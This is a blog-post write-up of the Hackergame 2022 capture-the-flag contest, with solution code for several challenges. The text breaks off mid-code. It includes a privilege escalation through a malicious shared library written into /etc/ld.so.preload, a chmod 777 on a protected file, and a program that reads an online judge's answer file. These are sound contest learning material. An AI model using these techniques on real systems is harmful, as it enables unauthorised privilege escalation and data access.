<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"><title>hackergame-2022 | Kn1GHT's blog</title><meta name="author" content="Kn1GHT"><meta name="copyright" content="Kn1GHT"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="hackergame 2022 部分题解结果  真·业余选手。第一次参加算是还可以的成绩（？ 题解hackergame 2022 我认为比较有意思的题目的题解（但是技术力低 HeiLang题目背景来自 Heicore 社区的新一代编程语言 HeiLang，基于第三代大蟒蛇语言，但是抛弃了原有的难以理解的 | 运算，升级为了更加先进的语法，用 A[x | y | z] &#x3D; t 来表示之前复杂的 A[">
<meta property="og:type" content="article">
<meta property="og:title" content="hackergame-2022">
<meta property="og:url" content="https://kn1ght897.github.io/2022/10/26/hackergame-2022/index.html">
<meta property="og:site_name" content="Kn1GHT&#39;s blog">
<meta property="og:description" content="hackergame 2022 部分题解结果  真·业余选手。第一次参加算是还可以的成绩（？ 题解hackergame 2022 我认为比较有意思的题目的题解（但是技术力低 HeiLang题目背景来自 Heicore 社区的新一代编程语言 HeiLang，基于第三代大蟒蛇语言，但是抛弃了原有的难以理解的 | 运算，升级为了更加先进的语法，用 A[x | y | z] &#x3D; t 来表示之前复杂的 A[">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2022-10-25T16:00:00.000Z">
<meta property="article:modified_time" content="2022-12-30T08:41:31.676Z">
<meta property="article:author" content="Kn1GHT">
<meta name="twitter:card" content="summary"><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="https://kn1ght897.github.io/2022/10/26/hackergame-2022/"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.min.css" media="print" onload="this.media='all'"><script>const GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  translate: undefined,
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '',
  date_suffix: {
    just: '刚刚',
    min: '分钟前',
    hour: '小时前',
    day: '天前',
    month: '个月前'
  },
  copyright: undefined,
  lightbox: 'fancybox',
  Snackbar: undefined,
  source: {
    justifiedGallery: {
      js: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery/dist/fjGallery.min.js',
      css: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery/dist/fjGallery.min.css'
    }
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isAnchor: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
  title: 'hackergame-2022',
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isToc: true,
  postUpdate: '2022-12-30 16:41:31'
}</script><noscript><style type="text/css">
  #nav {
    opacity: 1
  }
  .justified-gallery img {
    opacity: 1
  }

  #recent-posts time,
  #post-meta time {
    display: inline !important
  }
</style></noscript><script>(win=>{
    win.saveToLocal = {
      set: function setWithExpiry(key, value, ttl) {
        if (ttl === 0) return
        const now = new Date()
        const expiryDay = ttl * 86400000
        const item = {
          value: value,
          expiry: now.getTime() + expiryDay,
        }
        localStorage.setItem(key, JSON.stringify(item))
      },

      get: function getWithExpiry(key) {
        const itemStr = localStorage.getItem(key)

        if (!itemStr) {
          return undefined
        }
        const item = JSON.parse(itemStr)
        const now = new Date()

        if (now.getTime() > item.expiry) {
          localStorage.removeItem(key)
          return undefined
        }
        return item.value
      }
    }
  
    win.getScript = url => new Promise((resolve, reject) => {
      const script = document.createElement('script')
      script.src = url
      script.async = true
      script.onerror = reject
      script.onload = script.onreadystatechange = function() {
        const loadState = this.readyState
        if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
        script.onload = script.onreadystatechange = null
        resolve()
      }
      document.head.appendChild(script)
    })
  
      win.activateDarkMode = function () {
        document.documentElement.setAttribute('data-theme', 'dark')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
        }
      }
      win.activateLightMode = function () {
        document.documentElement.setAttribute('data-theme', 'light')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
        }
      }
      const t = saveToLocal.get('theme')
    
          if (t === 'dark') activateDarkMode()
          else if (t === 'light') activateLightMode()
        
      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        if (asideStatus === 'hide') {
          document.documentElement.classList.add('hide-aside')
        } else {
          document.documentElement.classList.remove('hide-aside')
        }
      }
    
    const detectApple = () => {
      if(/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)){
        document.documentElement.classList.add('apple')
      }
    }
    detectApple()
    })(window)</script><meta name="generator" content="Hexo 6.3.0"></head><body><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img is-center"><img src="/img/avatar.jpg" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="sidebar-site-data site-data is-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">3</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">0</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">0</div></a></div><hr/></div></div><div class="post" id="body-wrap"><header class="not-top-img" id="page-header"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">Kn1GHT's blog</a></span><div id="menus"><div id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></div></div></nav></header><main class="layout" id="content-inner"><div id="post"><div id="post-info"><h1 class="post-title">hackergame-2022</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2022-10-25T16:00:00.000Z" title="发表于 2022-10-26 00:00:00">2022-10-26</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2022-12-30T08:41:31.676Z" title="更新于 2022-12-30 16:41:31">2022-12-30</time></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-pv-cv" id="" data-flag-title="hackergame-2022"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">阅读量:</span><span id="busuanzi_value_page_pv"><i class="fa-solid fa-spinner fa-spin"></i></span></span></div></div></div><article class="post-content" id="article-container"><h1 id="hackergame-2022-部分题解"><a href="#hackergame-2022-部分题解" class="headerlink" title="hackergame 2022 部分题解"></a>hackergame 2022 部分题解</h1><h2 id="结果"><a href="#结果" class="headerlink" title="结果"></a>结果</h2><img src="/2022/10/26/hackergame-2022/%E7%BB%93%E6%9E%9C.jpg" class="" title="比赛结果">

<p>真·业余选手。第一次参加算是还可以的成绩（？</p>
<h2 id="题解"><a href="#题解" class="headerlink" title="题解"></a>题解</h2><p>hackergame 2022 我认为比较有意思的题目的题解（但是技术力低</p>
<h3 id="HeiLang"><a href="#HeiLang" class="headerlink" title="HeiLang"></a>HeiLang</h3><h4 id="题目背景"><a href="#题目背景" class="headerlink" title="题目背景"></a>题目背景</h4><p>来自 Heicore 社区的新一代编程语言 HeiLang，基于第三代大蟒蛇语言，但是抛弃了原有的难以理解的 <code>|</code> 运算，升级为了更加先进的语法，用 <code>A[x | y | z] = t</code> 来表示之前复杂的 <code>A[x] = t; A[y] = t; A[z] = t</code>。</p>
<p>作为一个编程爱好者，我觉得实在是太酷了，很符合我对未来编程语言的想象，科技并带着趣味。</p>
<h3 id="题目"><a href="#题目" class="headerlink" title="题目"></a>题目</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python3</span></span><br><span class="line"><span class="keyword">from</span> hashlib <span class="keyword">import</span> sha256</span><br><span class="line"></span><br><span class="line">a = [<span class="number">0</span>] * <span class="number">10000</span></span><br><span class="line"></span><br><span class="line">a[<span class="number">1225</span> | <span class="number">2381</span> | <span class="number">2956</span> | <span class="number">3380</span> | <span class="number">3441</span> | <span class="number">4073</span> | <span class="number">4090</span> | <span class="number">4439</span> | <span class="number">5883</span> | <span class="number">6253</span> | <span class="number">7683</span> | <span class="number">8231</span> | <span class="number">9933</span>] = <span class="number">978</span></span><br><span class="line">a[<span class="number">412</span> | <span class="number">5923</span> | <span class="number">7217</span> | <span class="number">7289</span> | <span class="number">7336</span>] = <span class="number">51</span></span><br><span class="line">a[<span class="number">296</span> | <span class="number">612</span> | <span class="number">873</span> | <span class="number">1232</span> | <span class="number">1531</span> | <span class="number">1941</span> | <span class="number">3640</span> | <span class="number">4449</span> | <span class="number">4488</span> | <span class="number">4698</span> | <span class="number">4703</span> | <span class="number">5225</span> | <span class="number">5868</span> | <span class="number">6132</span> | <span class="number">6904</span> | <span class="number">7812</span> | <span class="number">8127</span> | <span class="number">9156</span> | <span class="number">9781</span> | <span class="number">9917</span>] = <span class="number">807</span></span><br><span class="line">a[<span class="number">359</span> | <span class="number">379</span> | <span class="number">560</span> | <span class="number">1212</span> | <span class="number">1553</span> | <span class="number">3525</span> | <span class="number">4417</span> | <span class="number">5826</span> | <span class="number">6276</span> | <span class="number">6521</span> | <span class="number">8630</span> | <span class="number">9078</span> | <span class="number">9639</span>] = <span class="number">424</span></span><br><span class="line">a[<span class="number">609</span> | <span class="number">728</span> | <span class="number">1141</span> | <span class="number">1739</span> | <span class="number">2223</span> | <span class="number">3523</span> | <span class="number">3585</span> | <span class="number">5298</span> | <span class="number">7499</span> | <span class="number">8161</span> | <span class="number">9018</span>] = <span class="number">459</span></span><br><span class="line">a[<span class="number">152</span> | <span class="number">406</span> | <span class="number">892</span> | <span class="number">1688</span> | <span class="number">1864</span> | <span class="number">2115</span> | <span class="number">2226</span> | <span class="number">2462</span> | <span class="number">4824</span> | <span class="number">5304</span> | <span class="number">6374</span> | <span class="number">6587</span> | <span class="number">6739</span> | <span class="number">7168</span> | <span class="number">7611</span> | <span class="number">8497</span>] = <span class="number">39</span></span><br><span class="line">a[<span class="number">524</span> | <span class="number">901</span> | <span class="number">1339</span> | <span class="number">3681</span> | <span class="number">3840</span> | <span class="number">6378</span> | <span class="number">6897</span> | <span class="number">9534</span>] = <span class="number">808</span></span><br><span class="line">a[<span class="number">2794</span> | <span class="number">3363</span> | <span class="number">3825</span> | <span class="number">4432</span> | <span class="number">4648</span> | <span class="number">5519</span> | <span class="number">6355</span> | <span class="number">7030</span>] = <span class="number">518</span></span><br><span class="line"><span class="comment"># 很多类似的赋值语句</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">check</span>(<span class="params">a</span>):</span><br><span class="line">    user_hash = sha256((<span class="string">&#x27;heilang&#x27;</span> + <span class="string">&#x27;&#x27;</span>.join(<span class="built_in">str</span>(x) <span class="keyword">for</span> x <span class="keyword">in</span> a)).encode()).hexdigest()</span><br><span class="line">    expect_hash = <span class="string">&#x27;6efd4c4bb9432b9b5d7f9efff9a2494e2021ecf35af967aeb5124b78f25ada37&#x27;</span></span><br><span class="line">    <span class="keyword">return</span> user_hash == expect_hash</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">get_flag</span>(<span class="params">a</span>):</span><br><span class="line">    <span class="keyword">if</span> check(a):</span><br><span class="line">        t = <span class="string">&#x27;&#x27;</span>.join([<span class="built_in">chr</span>(x % <span class="number">255</span>) <span class="keyword">for</span> x <span class="keyword">in</span> a])</span><br><span class="line">        flag = sha256(t[:-<span class="number">16</span>].encode()).hexdigest()[:<span class="number">16</span>] + <span class="string">&#x27;-&#x27;</span> + sha256(t[-<span class="number">16</span>:].encode()).hexdigest()[:<span class="number">16</span>]</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;Tha flag is: flag&#123;&#123;&#123;&#125;&#125;&#125;&quot;</span>.<span class="built_in">format</span>(flag))</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;Array content is wrong, you can not get the correct flag.&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    get_flag(a)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>由于代码较长，这里就不展示完整的源码了。这个题目整体上如背景所述，是将赋值语句换了一个形式。我们可以将源码中 <code>A[x | y | z] = t</code> 这样的语句进行字符串替换，然后运行源码，就可以获得 flag。</p>
<p><del>出题人一看就没签何不扩散协议</del></p>
<h3 id="Xcaptcha"><a href="#Xcaptcha" class="headerlink" title="Xcaptcha"></a>Xcaptcha</h3><img src="/2022/10/26/hackergame-2022/Xcaptcha.jpg" class="">

<p>题目要求我们在 1 秒之内计算三个算式 (当然算不出来啦，除非……)。</p>
<p>我们的思路就是使用爬虫模拟这样一个过程。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> re</span><br><span class="line"><span class="keyword">import</span> httpx</span><br><span class="line"></span><br><span class="line">token = <span class="string">&#x27;your token&#x27;</span></span><br><span class="line">url = <span class="string">&#x27;http://202.38.93.111:10047/xcaptcha&#x27;</span></span><br><span class="line"></span><br><span class="line">client = httpx.Client(follow_redirects=<span class="literal">True</span>)</span><br><span class="line"></span><br><span class="line">client.get(</span><br><span class="line">    wrl, params=&#123;</span><br><span class="line">        <span class="string">&#x27;token&#x27;</span>: token</span><br><span class="line">    &#125;</span><br><span class="line">)</span><br><span class="line"></span><br><span class="line">resp = client.get(url)</span><br><span class="line">result = [<span class="built_in">eval</span>(it) <span class="keyword">for</span> it <span class="keyword">in</span> re.findall(<span class="string">r&#x27;([+\d]+) 的结果是？&#x27;</span>, resp.text)]</span><br><span class="line">payload = <span class="built_in">dict</span>(<span class="built_in">zip</span>([<span class="string">f&#x27;captcha<span class="subst">&#123;it&#125;</span>&#x27;</span> <span class="keyword">for</span> it <span class="keyword">in</span> (<span class="number">1</span>, <span class="number">2</span>, <span class="number">3</span>)], result))</span><br><span class="line"></span><br><span class="line">resp = client.post(</span><br><span class="line">    url, data=payload</span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(resp.text)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>这样的话，就可以获取 flag 了。</p>
<h3 id="猜数字"><a href="#猜数字" class="headerlink" title="猜数字"></a>猜数字</h3><p>我们分析下给出的 <code>GuessNumber.java</code> 中的代码</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 部分选取了给出的代码</span></span><br><span class="line"><span class="keyword">private</span> <span class="keyword">void</span> <span class="title function_">collect</span><span class="params">(XMLStreamWriter writer)</span> <span class="keyword">throws</span> XMLStreamException &#123;</span><br><span class="line">    writer.writeStartDocument();</span><br><span class="line">    <span class="comment">// &lt;state&gt;</span></span><br><span class="line">    writer.writeStartElement(<span class="string">&quot;state&quot;</span>);</span><br><span class="line">    <span class="comment">// &lt;name&gt;</span></span><br><span class="line">    writer.writeStartElement(<span class="string">&quot;name&quot;</span>);</span><br><span class="line">    writer.writeCharacters(<span class="built_in">this</span>.token.user());</span><br><span class="line">    writer.writeEndElement();</span><br><span class="line">    <span class="comment">// &lt;/name&gt;&lt;passed&gt;</span></span><br><span class="line">    writer.writeStartElement(<span class="string">&quot;passed&quot;</span>);</span><br><span class="line">    writer.writeCharacters(Integer.toString(<span class="built_in">this</span>.passed));</span><br><span class="line">    writer.writeEndElement();</span><br><span class="line">    <span class="comment">// &lt;/passed&gt;&lt;talented&gt;</span></span><br><span class="line">    writer.writeStartElement(<span class="string">&quot;talented&quot;</span>);</span><br><span class="line">    writer.writeCharacters(Integer.toString(<span class="built_in">this</span>.talented));</span><br><span class="line">    writer.writeEndElement();</span><br><span class="line">    <span class="comment">// &lt;/talented&gt;</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">this</span>.previous.isPresent()) &#123;</span><br><span class="line">    <span class="comment">// &lt;guess&gt;</span></span><br><span class="line">    <span class="type">var</span> <span class="variable">previous</span> <span class="operator">=</span> <span class="built_in">this</span>.previous.getAsDouble();</span><br><span class="line"></span><br><span class="line">    <span class="type">var</span> <span class="variable">isLess</span> <span class="operator">=</span> previous &lt; <span class="built_in">this</span>.number - <span class="number">1e-6</span> / <span class="number">2</span>;</span><br><span class="line">    <span class="type">var</span> <span class="variable">isMore</span> <span class="operator">=</span> previous &gt; <span class="built_in">this</span>.number + <span class="number">1e-6</span> / <span class="number">2</span>;</span><br><span class="line"></span><br><span class="line">    writer.writeStartElement(<span class="string">&quot;guess&quot;</span>);</span><br><span class="line">    writer.writeAttribute(<span class="string">&quot;less&quot;</span>, Boolean.toString(isLess));</span><br><span class="line">    writer.writeAttribute(<span class="string">&quot;more&quot;</span>, Boolean.toString(isMore));</span><br><span class="line">    writer.writeCharacters(Double.toString(previous));</span><br><span class="line">    writer.writeEndElement();</span><br><span class="line">    <span class="comment">// &lt;/guess&gt;</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">this</span>.talented &gt; <span class="number">0</span>) &#123;</span><br><span class="line">    <span class="comment">// &lt;flag&gt;</span></span><br><span class="line">    writer.writeStartElement(<span class="string">&quot;flag&quot;</span>);</span><br><span class="line">    writer.writeCharacters(<span class="built_in">this</span>.token.flag());</span><br><span class="line">    writer.writeEndElement();</span><br><span class="line">    <span class="comment">// &lt;/flag&gt;</span></span><br><span class="line">    &#125;</span><br><span class="line">    writer.writeEndElement();</span><br><span class="line">    <span class="comment">// &lt;/state&gt;</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>我们不难看出，代码中使用了两个变量 <code>isLes</code> 和 <code>isMore</code> 来判断输入的值小于还是大于目标值。如果既不小于，也不大于，我们就能够确定结果是正确的。那么如果输入的值是 <code>NaN</code> 呢? 如此这般，我们就把问题转化为如何输入 <code>NaN</code> 了。</p>
<p>我解决这个题的时候借助了 chrome 的 dev tools 来输入 <code>NaN</code>。</p>
<img src="/2022/10/26/hackergame-2022/%E7%8C%9C%E6%95%B0%E5%AD%97.jpg" class="">

<h3 id="安全的在线测评"><a href="#安全的在线测评" class="headerlink" title="安全的在线测评"></a>安全的在线测评</h3><h4 id="无法-AC-的题目"><a href="#无法-AC-的题目" class="headerlink" title="无法 AC 的题目"></a>无法 AC 的题目</h4><p>从给出的判题脚本中，我们可以找到下面的代码片段（有筛选）</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">DATA = <span class="string">&#x27;./data&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 测试静态数据</span></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(os.path.join(DATA, <span class="string">&#x27;static.in&#x27;</span>), <span class="string">&#x27;rb&#x27;</span>) <span class="keyword">as</span> f:</span><br><span class="line">    instr = f.read()</span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(os.path.join(DATA, <span class="string">&#x27;static.out&#x27;</span>), <span class="string">&#x27;r&#x27;</span>) <span class="keyword">as</span> f:</span><br><span class="line">    ans = f.read().strip().split(<span class="string">&#x27;\n&#x27;</span>)</span><br><span class="line">res = check_excutable(BIN, instr, ans, <span class="number">0.5</span>)</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;静态数据测试：&#x27;</span>, res_map[res])</span><br><span class="line"><span class="keyword">if</span> res == <span class="string">&#x27;AC&#x27;</span>:</span><br><span class="line">    <span class="built_in">print</span>(flag1, flush=<span class="literal">True</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    exit(<span class="number">0</span>)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;\n&#x27;</span>)</span><br></pre></td></tr></table></figure>

<p>不难得知，静态数据的输出结果在 <code>./data/static.out</code> 文件中，我们直接读取文件，并且输出文件内容就好。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span> &#123;</span><br><span class="line">    FILE *file = fopen(<span class="string">&quot;./data/static.out&quot;</span>, <span class="string">&quot;r&quot;</span>);</span><br><span class="line">    <span class="type">char</span> line[<span class="number">1024</span>];</span><br><span class="line">    <span class="built_in">fscanf</span>(file, <span class="string">&quot;%s&quot;</span>, line);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;%s\n&quot;</span>, line);</span><br><span class="line">    <span class="built_in">fscanf</span>(file, <span class="string">&quot;%s&quot;</span>, line);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;%s\n&quot;</span>, line);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h3 id="传达不到的文件"><a href="#传达不到的文件" class="headerlink" title="传达不到的文件"></a>传达不到的文件</h3><img src="/2022/10/26/hackergame-2022/%E4%BC%A0%E8%BE%BE%E4%B8%8D%E5%88%B0%E7%9A%84%E6%96%87%E4%BB%B6-1.jpg" class="" title="虚拟环境截图">

<p><strong>题目：探索虚拟环境，拿到两个 flag：flag1 在 &#x2F;chall 中，flag2 在 &#x2F;flag2 中。</strong></p>
<p>通过上图和题目，我们有一个不难的思路，就是提权并修改文件的权限。在本题中，经过我的尝试，不能直接切换到 root 用户，也不能通过 <code>sudo</code> 提权。我使用的是通过 <code>ld</code> 进行注入，从而实现提权。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/stat.h&gt;</span></span></span><br><span class="line"></span><br><span class="line">__attribute__((constructor)) <span class="type">void</span> <span class="title function_">inject</span><span class="params">()</span> &#123;</span><br><span class="line">    FILE* fp = fopen(<span class="string">&quot;flag2&quot;</span>, <span class="string">&quot;r&quot;</span>);</span><br><span class="line">    <span class="type">char</span> flag[<span class="number">256</span>];</span><br><span class="line">    <span class="built_in">fscanf</span>(fp, <span class="string">&quot;%s&quot;</span>, flag);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;ok\n&quot;</span>);</span><br><span class="line">    chmod(<span class="string">&quot;/chall&quot;</span>, <span class="number">777</span>);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;%s\n&quot;</span>, flag);</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>将上面的代码编译为 <code>inject.so</code> 上传到环境， 再通过 <code>echo /inject.so &gt; /etc/ld.so.preload</code> 添加到配置中。 我们直接运行任何 <code>/chall</code> 就可以从输出中获取 <code>flag2</code>。然后在 shell 中 <code>strins /chall</code> 就可以获取 flag1。</p>
<h3 id="看不见的彼方"><a href="#看不见的彼方" class="headerlink" title="看不见的彼方"></a>看不见的彼方</h3><h4 id="题目背景-1"><a href="#题目背景-1" class="headerlink" title="题目背景"></a>题目背景</h4><p>虽然看见的是同一片天空（指运行在同一个 kernel 上），脚踏着的是同一块土地（指使用同一个用户执行），他们之间却再也无法见到彼此——因为那名为 chroot(2) 的牢笼，他们再也无法相见。为了不让他们私下串通，魔王甚至用 seccomp(2)，把他们调用与 socket 相关的和调试相关的系统调用的权利也剥夺了去。</p>
<p>但即使无法看到对方所在的彼方，他们相信，他们的心意仍然是相通的。即使心处 chroot(2) 的牢笼，身缚 seccomp(2) 的锁链，他们仍然可以将自己想表达的话传达给对方。</p>
<p>你需要上传两个 x86_64 架构的 Linux 程序。为了方便描述，我们称之为 Alice 和 Bob。两个程序会在独立的 chroot 环境中运行。</p>
<p>在 Alice 的环境中，secret 存储在 &#x2F;secret 中，可以直接读取，但是 Alice 的标准输出和标准错误会被直接丢弃；在 Bob 的环境中，没有 flag，但是 Bob 的标准输出和标准错误会被返回到网页中。&#x2F;secret 的内容每次运行都会随机生成，仅当 Bob 的标准输出输出与 Alice 的 &#x2F;secret 内容相同的情况下，你才能够获得 flag。</p>
<p>执行环境为 Debian 11，两个程序文件合计大小需要在 10M 以下，最长允许运行十秒。特别地，如果你看到 “Failed to execute program.” 或其他类似错误，那么说明你的程序需要的运行时库可能在环境中不存在，你需要想办法在满足大小限制的前提下让你的程序能够顺利运行。</p>
<h4 id="解题过程"><a href="#解题过程" class="headerlink" title="解题过程"></a>解题过程</h4><p>从题目来看，我们要实现的是两个被 chroot 隔离的进程之间的通信。但是 A 环境不能写入，B 环境不能读取。</p>
<p>看到这道题时我的初步思路是 mmap，但是由于题目限制无法使用，但是我们仍旧可以通过共享内存进行通信。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// a.c</span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/shm.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span> &#123;</span><br><span class="line">    FILE *fp = fopen(<span class="string">&quot;/secret&quot;</span>, <span class="string">&quot;r&quot;</span>);</span><br><span class="line">    <span class="type">char</span> buffer[<span class="number">1024</span>];</span><br><span class="line">    <span class="built_in">fscanf</span>(fp, <span class="string">&quot;%s&quot;</span>, buffer);</span><br><span class="line">    fclose(fp);</span><br><span class="line"></span><br><span class="line">    <span class="type">int</span> id = shmget(<span class="number">1111</span>, <span class="number">0x1000</span>, IPC_CREAT | <span 